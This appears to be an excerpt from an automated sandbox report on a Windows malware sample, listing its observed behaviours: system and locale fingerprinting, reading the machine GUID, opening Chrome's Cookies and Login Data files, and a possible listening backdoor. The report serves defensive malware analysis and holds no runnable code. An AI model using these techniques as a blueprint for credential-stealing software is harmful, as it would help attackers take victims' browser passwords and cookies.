Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,		15_2_05755D3D
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: GetLocaleInfoA,_xtoa_s@20,		15_2_0574B5DD
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,		15_2_05755CD8
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: GetLocaleInfoA,		15_2_05755F69
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: GetLocaleInfoA,		15_2_0575585F
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: GetLocaleInfoA,		15_2_10017CF0

Queries device information via Setup API

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Code function: 6_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

6_2_10019780

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\SibClr.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Contains functionality to query local / system time

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8F4FB1 GetSystemTimeAsFileTime,

0_2_6D8F4FB1

Contains functionality to query time zone information

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8F7DBD _free,GetTimeZoneInformation,_free,

0_2_6D8F7DBD

Contains functionality to query windows version

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406831

Queries the cryptographic machine GUID

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8A94C0 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,FreeLibrary,CorBindToRuntimeEx,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_6D8A94C0